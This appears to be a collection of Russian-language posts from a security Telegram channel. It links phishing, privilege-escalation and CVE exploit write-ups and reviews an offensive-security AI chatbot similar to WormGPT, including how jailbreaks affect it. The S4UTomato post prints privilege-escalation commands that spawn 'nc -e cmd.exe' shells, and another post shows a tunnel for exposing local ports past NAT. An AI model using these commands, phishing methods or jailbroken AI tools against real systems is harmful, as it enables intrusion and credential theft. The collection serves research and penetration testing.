📣ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота

ChatGPT сей­час раз­ве что в кот­леты не кла­дут. В этой статье мы рас­ска­жем, как в про­екте по соци­аль­ной инже­нерии с помощью фор­ка биб­лиоте­ки для Gophish рас­сылать QR-коды вмес­то обыч­ных ссы­лок, что­бы вытащить сот­рудни­ков из защищен­ного рабоче­го окру­жения на лич­ные девай­сы. В качес­тве catchy-сце­нария рас­сылки мы рас­смот­рим «Telegram-бот IT-под­дер­жки с ChatGPT» и на самом деле исполь­зуем эту ней­росеть для генера­ции кода бота, а так­же под­клю­чим интегра­цию с API OpenAI для обще­ния с поль­зовате­лями.

#xakep #chatgpt

💬 Канал | 📶 Хакер

Local Privilege Escalation glibc's ld.so (CVE-2023-4911)

➡️ Исследование

🔥POC: https://github.com/leesh3288/CVE-2023-4911

#linux #lpe

💬 Канал | 📶 Github

💣 Chat WhiteHat

⛈Я думаю многие из вас слышали о WormGPT, которая не продолжительное время была на хайпе. В основе у неё была GPT-J 6B model, а автор переучил нейросеть, чтобы она выдавала запрещеку, так сказать. Но как хайп ушёл, большинство забыло про эту нейронку, да и цены от 500 до 5к вечнозеленых кусаются. Но сегодня чисто случайно в перерыве между работой и работой нашёл новую нейросеть, нацеленную на offensive security.

🛡 Рега простая, есть бесплатный тестовый период, но всё равно требует ввести валидную банковскую карту для тестового платежа. У меня списало 0.00 USD, так что наличие даже пол бакса на карте будет достаточно. Есть ограничение в 10к токенов, но я уже довольно много запросов вводил, тратиться в среднем по 15 токенов. Следовательно вам хватит примерно на 666 запросов. Далее либо надо платить, либо новый акк.

💸 Цены 28$ за базовую версию с 10к токенов, далее Super за 38$ и уже даётся 20к и доступ ко всем функциям (какие есть ещё помимо AI и leaked check не знаю) и финальная White Hat за 48$ с 30к токенов. Количество токенов обновляется каждый месяц. Запросы строятся похожим образом, как в ChatGPT, но jailbreak'и ему давать бессмысленно, она зависает. Также эмпирическим методом выявил, что просить сгенерировать и обфусцировать payload'ы - плохая идея, т.к. он просто ставит эмодзи+тот же самый payload. Ответы генерируются достаточно медленно, в раза 2 дольше, чем ChatGPT 4 или Claude.

📌 На мой взгляд потестить её можно для рабочих задач. Но полагаться на работоспособность кода или информации не стоит, также как и на ChatGPT 4. Плюсами нейросети является условная бесплатность нейросети, податливость при любых запросах и функция проверки попадала ли ваша почта в слитые БД.

(Я случайно сломал её и теперь она не реагирует на мои запросы))) Это натолкнуло на мысль, что это ChatGPT 4+грамотный промт, т.к. я дал свой jailbreak и оно сломалось)

😬 Потыкать нейросеть

#ai #chatgpt #offensive

💬 Канал | 📶 Whitehat AI

S4UTomato
#LPE #windows

Инструмент позволяющий выполнить повышение привилегий через Kerberos. Но главное отличие в том, что данный метод, хоть и схож с ранее известными методами privesc из семейства "Potato", но вместо использования COM-интерфейсов, здесь используется расширение S4U для получения билета службы для учетной записи администратора домена на локальной машине. Затем этот билет используется для создания системной службы и получения SYSTEM. Данный инструмент сочетает в себе сразу 3 техники:
1. LEP via Resource-based Constrained Delegation (ссылка)

S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"

2. LEP via Shadow Credentials + S4U2self (ссылка)

S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f

3. LEP via Tgtdeleg + S4U2self (ссылка)

# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"

💻 Github repo

💬 Канал

🔼🔽Небезопасная многопоточность или Race Condition
#bugbounty #pentest #web

Как я и люблю - мы начнем с условных основ и будем двигаться постепенно всё глубже и глубже. Ближе к концу разберём, как эксплуатировать. При написании статьи было использовано много разных источников. К чему это? А к тому, что я начну со слов, которые нашел в статье у Бума - про него будет дальше. Что ж, приятного чтения.
Race condition (состояние гонки) - это ситуация, при которой несколько потоков (или процессов) одновременно пытаются выполнить операции чтения или записи к общим ресурсам без должной синхронизации. Представить можно в формате очереди, один за одним.

⚡️ Статья на Habr | 🛡 Дневник Безопасника

1-Click RCE on GNOME (CVE-2023-43641)
#RCE #linux #gnome #cve

Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.

🖥 Статья | 🛡 Дневник Безопасника

root with a single command: sudo logrotate
#LPE #linux

Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано: sudo logrotate *. Сможем ли мы получить root? Короткий ответ: Да. Автор не смог найти в Интернете интересной информации о подобной эксплуатации logrotate, поэтому давайте изучим подробнее.

🔥 Статья | 🛡 Дневник Безопасника

вдогонку Github репа с другим PoC

CVE-2023-22515: Confluence Broken Access Control Exploit
#confluence #cve #BAC

Данный скрипт предназначен для эксплуатации уязвимости CVE-2023-22515 в Confluence, которая позволяет получить несанкционированный доступ к экземплярам Confluence Server и Confluence Data Center. Уязвимость относится к категории Broken Access Control и имеет базовую оценку CVSS 10.0. ⚠️

https://github.com/Chocapikk/CVE-2023-22515

🛡 Дневник Безопасника

bore
#cli #rust

Современный, простой TCP-туннель на языке Rust, который открывает локальные порты для удаленного сервера, обходя стандартные брандмауэры NAT-соединений. Это все, что он делает: не больше и не меньше. По сути тот же duckdns, но без регистрации.

Установка:
cargo install bore-cli
для MacOS

brew install bore-cli

Использование:

bore local 8000 --to bore.pub

Также вы можете использовать его, как сервер, но зачем?... Мы не ради этого собрались тут)

bore server

💻 Github Repo | 🛡 Дневник Безопасника